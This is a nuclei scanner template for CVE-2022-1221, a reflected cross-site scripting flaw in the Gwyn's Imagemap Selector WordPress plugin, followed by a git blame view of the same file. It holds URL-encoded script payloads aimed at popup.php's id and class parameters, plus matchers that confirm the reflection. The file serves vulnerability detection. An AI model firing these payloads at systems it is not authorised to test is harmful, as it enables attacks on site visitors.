nuclei-templates/cves/2022/CVE-2022-1221.yaml

id: CVE-2022-1221

info:
  name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
  author: veshraj
  severity: medium
  description: |
    The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221
  classification:
    cve-id: CVE-2022-1221
  metadata:
    verified: true
  tags: xss,wordpress,wp-plugin,wp,cve,cve2022

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
      - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script> popup-"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
Update CVE-2022-1221.yaml 2022-05-11 13:20:31 +00:00			`id: CVE-2022-1221`

Create CVE-2022-1221.yaml 2022-05-11 13:17:48 +00:00			`info:`
			`name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting`
			`author: veshraj`
			`severity: medium`
			`description: \|`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting.`
Create CVE-2022-1221.yaml 2022-05-11 13:17:48 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221`
Dashboard Content Enhancements (#4381) Dashboard Content Enhancements 2022-05-13 20:26:43 +00:00			`classification:`
			`cve-id: CVE-2022-1221`
Update CVE-2022-1221.yaml 2022-05-11 18:58:12 +00:00			`metadata:`
			`verified: true`
Create CVE-2022-1221.yaml 2022-05-11 13:17:48 +00:00			`tags: xss,wordpress,wp-plugin,wp,cve,cve2022`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'`
			`- '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'`
Update CVE-2022-1221.yaml 2022-05-11 18:58:12 +00:00
			`stop-at-first-match: true`
Create CVE-2022-1221.yaml 2022-05-11 13:17:48 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-1221.yaml 2022-05-11 18:58:12 +00:00			`- "</script><script>alert(document.domain)</script> popup-"`
Create CVE-2022-1221.yaml 2022-05-11 13:17:48 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`